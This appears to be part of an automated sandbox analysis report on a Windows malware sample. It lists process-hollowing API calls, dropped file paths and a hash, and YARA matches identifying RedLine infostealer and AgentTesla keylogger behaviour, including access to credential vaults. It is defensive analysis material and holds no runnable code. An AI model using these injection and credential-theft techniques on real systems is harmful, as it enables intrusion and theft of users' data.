Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031DDC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,	3_2_031DDC04
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031DDC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	3_2_031DDC8C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031DDBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,	3_2_031DDBB0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031D7A2A NtAllocateVirtualMemory,	3_2_031D7A2A
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031D8D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	3_2_031D8D6E
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 10_2_031B8670 NtUnmapViewOfSection,	10_2_031B8670
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 10_2_031B8400 NtReadVirtualMemory,	10_2_031B8400
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 10_2_031B7A2C NtAllocateVirtualMemory,	10_2_031B7A2C
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 10_2_031B7D78 NtWriteVirtualMemory,	10_2_031B7D78
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 10_2_031B8D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	10_2_031B8D70
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 10_2_031BDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,	10_2_031BDD70
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 10_2_031B86F7 NtUnmapViewOfSection,	10_2_031B86F7
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 10_2_031BDBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	10_2_031BDBB0
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 10_2_031B7A2A NtAllocateVirtualMemory,	10_2_031B7A2A
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 10_2_031B7AC9 NtAllocateVirtualMemory,	10_2_031B7AC9
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 10_2_031B8D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	10_2_031B8D6E
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 10_2_031BDC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	10_2_031BDC04
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 10_2_031BDC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,	10_2_031BDC8C
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 16_2_031A8670 NtUnmapViewOfSection,	16_2_031A8670
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 16_2_031A8400 NtReadVirtualMemory,	16_2_031A8400
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 16_2_031A7A2C NtAllocateVirtualMemory,	16_2_031A7A2C
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 16_2_031A7D78 NtWriteVirtualMemory,	16_2_031A7D78
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 16_2_031A8D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	16_2_031A8D70
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 16_2_031ADD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,	16_2_031ADD70
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 16_2_031A86F7 NtUnmapViewOfSection,	16_2_031A86F7
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 16_2_031ADBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	16_2_031ADBB0
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 16_2_031A7A2A NtAllocateVirtualMemory,	16_2_031A7A2A
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 16_2_031A7AC9 NtAllocateVirtualMemory,	16_2_031A7AC9
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 16_2_031A8D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	16_2_031A8D6E
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 16_2_031ADC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	16_2_031ADC04
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 16_2_031ADC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,	16_2_031ADC8C

Contains functionality to launch a process as a different user

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 3_2_031D8788 CreateProcessAsUserW,

3_2_031D8788

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031C20C4	3_2_031C20C4
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_00408C60	9_2_00408C60
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_0040DC11	9_2_0040DC11
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_00407C3F	9_2_00407C3F
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_00418CCC	9_2_00418CCC
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_00406CA0	9_2_00406CA0
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_004028B0	9_2_004028B0
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_0041A4BE	9_2_0041A4BE
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_00408C60	9_2_00408C60
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_00418244	9_2_00418244
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_00401650	9_2_00401650
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_00402F20	9_2_00402F20
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_004193C4	9_2_004193C4
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_00418788	9_2_00418788
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_00402F89	9_2_00402F89
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_00402B90	9_2_00402B90
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_004073A0	9_2_004073A0
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_27F6DA50	9_2_27F6DA50
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_27F6CE38	9_2_27F6CE38
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_27F60FD0	9_2_27F60FD0
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_27F6D180	9_2_27F6D180
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_27F61030	9_2_27F61030
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_2D186748	9_2_2D186748
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_2D18CFC8	9_2_2D18CFC8
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_2D1899C0	9_2_2D1899C0
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_2D180040	9_2_2D180040
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_2D18F278	9_2_2D18F278
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_2D18F9D2	9_2_2D18F9D2
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_2D180007	9_2_2D180007
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_2D18C0E8	9_2_2D18C0E8
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_2D8157B7	9_2_2D8157B7
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_2D8109D0	9_2_2D8109D0
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_2D81A8A2	9_2_2D81A8A2
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_2D81DE38	9_2_2D81DE38
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_2D811AC8	9_2_2D811AC8
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_2DB81C60	9_2_2DB81C60
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_2DB8E720	9_2_2DB8E720
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_2DB81C57	9_2_2DB81C57
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_2DEC4571	9_2_2DEC4571
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_1_00408C60	9_1_00408C60
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_1_0040DC11	9_1_0040DC11
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_1_00407C3F	9_1_00407C3F
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_1_00418CCC	9_1_00418CCC
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_1_00406CA0	9_1_00406CA0
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_1_004028B0	9_1_004028B0
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_1_0041A4BE	9_1_0041A4BE
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_1_00408C60	9_1_00408C60
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_1_00418244	9_1_00418244
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_1_00401650	9_1_00401650
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_1_00402F20	9_1_00402F20
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_1_004193C4	9_1_004193C4
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_1_00418788	9_1_00418788
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_1_00402F89	9_1_00402F89
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_1_00402B90	9_1_00402B90
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_1_004073A0	9_1_004073A0
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 10_2_031A20C4	10_2_031A20C4
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 10_2_031AC98E	10_2_031AC98E
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 10_2_031AC9DE	10_2_031AC9DE
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_00408C60	11_2_00408C60
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_0040DC11	11_2_0040DC11
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_00407C3F	11_2_00407C3F
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_00418CCC	11_2_00418CCC
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_00406CA0	11_2_00406CA0
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_004028B0	11_2_004028B0
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_0041A4BE	11_2_0041A4BE
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_00408C60	11_2_00408C60
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_00418244	11_2_00418244
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_00401650	11_2_00401650
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_00402F20	11_2_00402F20
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_004193C4	11_2_004193C4
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_00418788	11_2_00418788
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_00402F89	11_2_00402F89
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_00402B90	11_2_00402B90
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_004073A0	11_2_004073A0
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_24F1DCE8	11_2_24F1DCE8
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_24F1D0D0	11_2_24F1D0D0
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_24F11030	11_2_24F11030
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_24F1D418	11_2_24F1D418
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_24F10FD0	11_2_24F10FD0
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_2A490040	11_2_2A490040
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_2A4999A0	11_2_2A4999A0
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_2A496728	11_2_2A496728
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_2A49CFA8	11_2_2A49CFA8
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_2A49002F	11_2_2A49002F
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_2AB1A8CF	11_2_2AB1A8CF
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_2AB107C0	11_2_2AB107C0
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_2AB155A7	11_2_2AB155A7
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_2AB118B8	11_2_2AB118B8
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_2AB1DD88	11_2_2AB1DD88
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_2AFE0C30	11_2_2AFE0C30
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_2AFEE860	11_2_2AFEE860
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_1_00408C60	11_1_00408C60
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_1_0040DC11	11_1_0040DC11
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_1_00407C3F	11_1_00407C3F
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_1_00418CCC	11_1_00418CCC
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_1_00406CA0	11_1_00406CA0
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_1_004028B0	11_1_004028B0
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_1_0041A4BE	11_1_0041A4BE
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_1_00408C60	11_1_00408C60
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_1_00418244	11_1_00418244
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_1_00401650	11_1_00401650
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_1_00402F20	11_1_00402F20
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_1_004193C4	11_1_004193C4
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_1_00418788	11_1_00418788
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_1_00402F89	11_1_00402F89
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_1_00402B90	11_1_00402B90
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_1_004073A0	11_1_004073A0
Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe	Code function: 13_2_004057B8	13_2_004057B8
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 16_2_031920C4	16_2_031920C4
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 16_2_0319C98F	16_2_0319C98F
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 16_2_0319C9DF	16_2_0319C9DF

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\Public\Libraries\xrbjyllC.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe	Code function: String function: 0040A6C4 appears 68 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 031C46D4 appears 244 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 031D89D0 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 031D894C appears 56 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 031C4500 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 031C4860 appears 949 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 031C44DC appears 74 times
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: String function: 031A894C appears 50 times
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: String function: 031946D4 appears 155 times
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: String function: 03194860 appears 683 times
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: String function: 031A46D4 appears 155 times
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: String function: 031A4860 appears 683 times
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: String function: 031B894C appears 50 times
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: String function: 0040D606 appears 96 times
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: String function: 0040E1D8 appears 172 times
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: String function: 0040FB9C appears 40 times

Yara signature match

Source: 9.1.xrbjyllC.pif.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 17.1.xrbjyllC.pif.400000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 11.2.xrbjyllC.pif.400000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 11.2.xrbjyllC.pif.29a80000.9.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.xrbjyllC.pif.29a80000.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 9.2.xrbjyllC.pif.2ace5190.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.xrbjyllC.pif.2ace5190.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.3.xrbjyllC.pif.24f7d9c8.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.3.xrbjyllC.pif.24f7d9c8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 9.2.xrbjyllC.pif.2c240000.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.xrbjyllC.pif.2c240000.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.25040000.9.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 17.2.xrbjyllC.pif.25040000.9.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.23765190.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 17.2.xrbjyllC.pif.23765190.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.2.xrbjyllC.pif.29a80000.9.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.xrbjyllC.pif.29a80000.9.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.2.xrbjyllC.pif.27fa5190.8.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.xrbjyllC.pif.27fa5190.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 9.2.xrbjyllC.pif.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.xrbjyllC.pif.2c240ee8.8.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.xrbjyllC.pif.2c240ee8.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 9.1.xrbjyllC.pif.400000.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.25040000.9.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 17.2.xrbjyllC.pif.25040000.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.2.xrbjyllC.pif.26ec0ee8.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.xrbjyllC.pif.26ec0ee8.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.2.xrbjyllC.pif.26affca6.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.xrbjyllC.pif.26affca6.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.2.xrbjyllC.pif.27fa5190.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.xrbjyllC.pif.27fa5190.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.22680ee8.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 17.2.xrbjyllC.pif.22680ee8.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.1.xrbjyllC.pif.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 11.2.xrbjyllC.pif.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
